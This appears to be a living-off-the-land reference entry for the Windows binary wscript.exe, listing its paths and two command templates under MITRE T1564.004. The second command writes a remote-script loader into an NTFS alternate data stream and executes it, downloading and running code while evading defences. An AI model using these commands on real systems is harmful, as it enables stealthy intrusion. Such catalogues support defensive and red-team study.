Wscript.exe

type: OSBinaries
Used by Windows to execute scripts

Full path

C:\Windows\System32\wscript.exe
C:\Windows\SysWOW64\wscript.exe

Commands

  1. ADSUser T1564.004

    Execute hidden code to evade defensive counter measures

    wscript //e:vbscript {PATH}:script.vbs

    Execute script stored in an alternate data stream

    os: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11

    Execute: WSH

  2. ADSUser T1564.004

    Execute hidden code to evade defensive counter measures

    echo GetObject("script:{REMOTEURL:.js}") > {PATH_ABSOLUTE}:hi.js && wscript.exe {PATH_ABSOLUTE}:hi.js

    Download and execute script stored in an alternate data stream

    os: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11

Detection

Resources

acknowledgement: Oddvar Moe @oddvarmoe, SaiLay(valen) @404death